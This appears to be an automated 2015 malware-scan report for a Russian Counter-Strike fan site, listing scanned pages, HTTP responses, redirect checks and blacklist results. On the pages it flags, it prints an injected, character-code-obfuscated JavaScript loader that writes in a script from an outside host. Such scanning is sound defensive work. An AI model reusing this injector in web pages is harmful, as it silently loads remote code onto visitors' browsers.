Scanned pages/files
Request | Server response | Status |
http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/-36-0-36 | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 05:06:43 GMT Location: http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/0-36-0-36 Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 4css-publicuCoz=; path=/; expires=Mon, 22-Jul-2013 05:06:43 GMT; domain=.css-public.3dn.ru; | clean |
http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/0-36-0-36 | 200 OK Content-Length: 28318 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://s36.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://css-public.3dn.ru/ | 200 OK Content-Length: 24101 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/load | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 05:06:45 GMT Location: http://css-public.3dn.ru/load/ Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 4css-publicuCoz=; path=/; expires=Mon, 22-Jul-2013 05:06:45 GMT; domain=.css-public.3dn.ru; | clean |
http://css-public.3dn.ru/load/ | 200 OK Content-Length: 25741 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru//forum/ | 200 OK Content-Length: 31025 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/istorija_cs_source/0-7 | 200 OK Content-Length: 32852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/istorija_cs/0-5 | 200 OK Content-Length: 30361 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/counter_strike_online/0-10 | 200 OK Content-Length: 27522 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/dvizhok_source/0-11 | 200 OK Content-Length: 42638 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/konsol/0-12 | 200 OK Content-Length: 51842 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/skripty/0-13 | 200 OK Content-Length: 41059 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/faq_po_cs/0-14 | 200 OK Content-Length: 58751 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://css-public.3dn.ru/index/opisanie_oruzhija_cs/0-15 | 200 OK Content-Length: 78608 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: css-public.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:06:44 GMT
Server: uServ/3.2.2
Content-Length: 24101
Content-Type: text/html; charset=UTF-8
...24101 bytes of data.
GET / HTTP/1.1
Host: css-public.3dn.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:06:44 GMT
Server: uServ/3.2.2
Content-Length: 24101
Content-Type: text/html; charset=UTF-8
...24101 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: css-public.3dn.ru
Referer: http://www.google.com/search?q=css-public.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: css-public.3dn.ru
Referer: http://www.google.com/search?q=css-public.3dn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=css-public.3dn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://css-public.3dn.ru/
Result: css-public.3dn.ru is not infected or malware details are not published yet.
Result: css-public.3dn.ru is not infected or malware details are not published yet.